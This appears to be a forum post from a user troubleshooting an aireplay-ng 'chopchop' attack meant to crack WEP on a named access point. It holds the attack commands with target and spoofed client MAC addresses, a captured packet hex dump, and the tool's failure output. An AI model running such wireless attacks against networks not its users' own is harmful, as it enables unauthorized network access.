So, continuing my research, I'm facing new problems again and again, questions, questions...
I've managed to stumble on some Spanish video (why not Japanese... what will they think of next) - [Video] Chopchop without clients using IPW2200, link http://mirror-wifislax.lost-away.org...opchopipw2.htm
So I've used that walkthrough until this moment:
aireplay-ng --ipwsys -4 -a 00:1D:7E:BC:FA:D2 -h 6c:59:28:42:36:44 -i rtap0 eth1
and then I get:
aireplay-ng: unrecognized option `--ipwsys'
I don't understand, if it worked for the Spanish guy, where has it gone now? So anyway, I just deleted that "--ipwsys" and tried to run without it. Then I get:
bt ~ # aireplay-ng -4 -a 00:1D:7E:BC:FA:D2 -h 00:16:6F:63:31:80 -i rtap0 eth1
Read 621 packets...
Size: 344, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:1D:7E:BC:FA:D2
Dest. MAC = 01:00:5E:7F:FF:FA
Source MAC = 00:1D:7E:BC:FA:D0
0x0000: 0862 0000 0100 5e7f fffa 001d 7ebc fad2 .b....^....~...
0x0010: 001d 7ebc fad0 c01a bcd9 2500 496f c23a ..~.......%.Io.:
0x0020: 8b84 a376 9fad df60 bf31 fd45 bd71 1f3d ...v...`.1.E.q.=
0x0030: 5aac 82b5 15d0 c03d 8c8e ebd1 ffb4 e28a Z......=........
0x0040: c446 56ed 37a8 e796 07af ae84 6788 1bb0 .FV.7.......g...
0x0050: b179 34b7 4a29 8f1a c81a df41 436b 2386 .y4.J).....ACk#.
0x0060: ef41 0f7c ea1d c95b 6025 7350 b6ec 0b4b .A.|...[`%sP...K
0x0070: 5920 d7cf 4cd4 13c5 f160 ba50 0069 e971 Y ..L....`.P.i.q
0x0080: e6c5 270a 7d6c 663f d9af dcca 464c 9374 ..'.}lf?....FL.t
0x0090: 61d9 8100 ba17 2ac8 a7d1 8e9e 4abd 3d01 a.....*.....J.=.
0x00a0: 982b e5da 597c c4d5 19b7 ce02 e1a4 1018 .+..Y|..........
0x00b0: 7129 77a2 62de 7444 b326 4146 a3c7 ae98 q)w.b.tD.&AF....
0x00c0: b746 418b 631e 35d5 0f74 e3d7 74e5 ac33 .FA.c.5..t..t..3
0x00d0: 9fe6 cd37 fec4 684d ceb6 dd8c d96f 27f2 ...7..hM.....o'.
--- CUT ---
Use this packet ? y
Saving chosen packet in replay_src-0803-212715.cap
Sent 434 packets, current guess: B0...
The chopchop attack appears to have failed. Possible reasons:
* You're trying to inject with an unsupported chipset (Centrino?).
* The driver source wasn't properly patched for injection support.
* You are too far from the AP. Get closer or reduce the send rate.
* Target is 802.11g only but you are using a Prism2 or RTL8180.
* The wireless interface isn't setup on the correct channel.
* The client MAC you have specified is not currently authenticated.
Try running another aireplay-ng to fake authentication (attack "-1").
* The AP isn't vulnerable when operating in authenticated mode.
Try aireplay-ng in non-authenticated mode instead (no -h option).
None of the "Possible reasons" are really possible in my case. Surfing Google gave no serious results on this; also, searching this forum I found only a couple of threads with very similar problems, with dead ends. And one more naive question: what the hell is rtap0? Is it some simulated/emulated adapter? In that case, what is it needed for?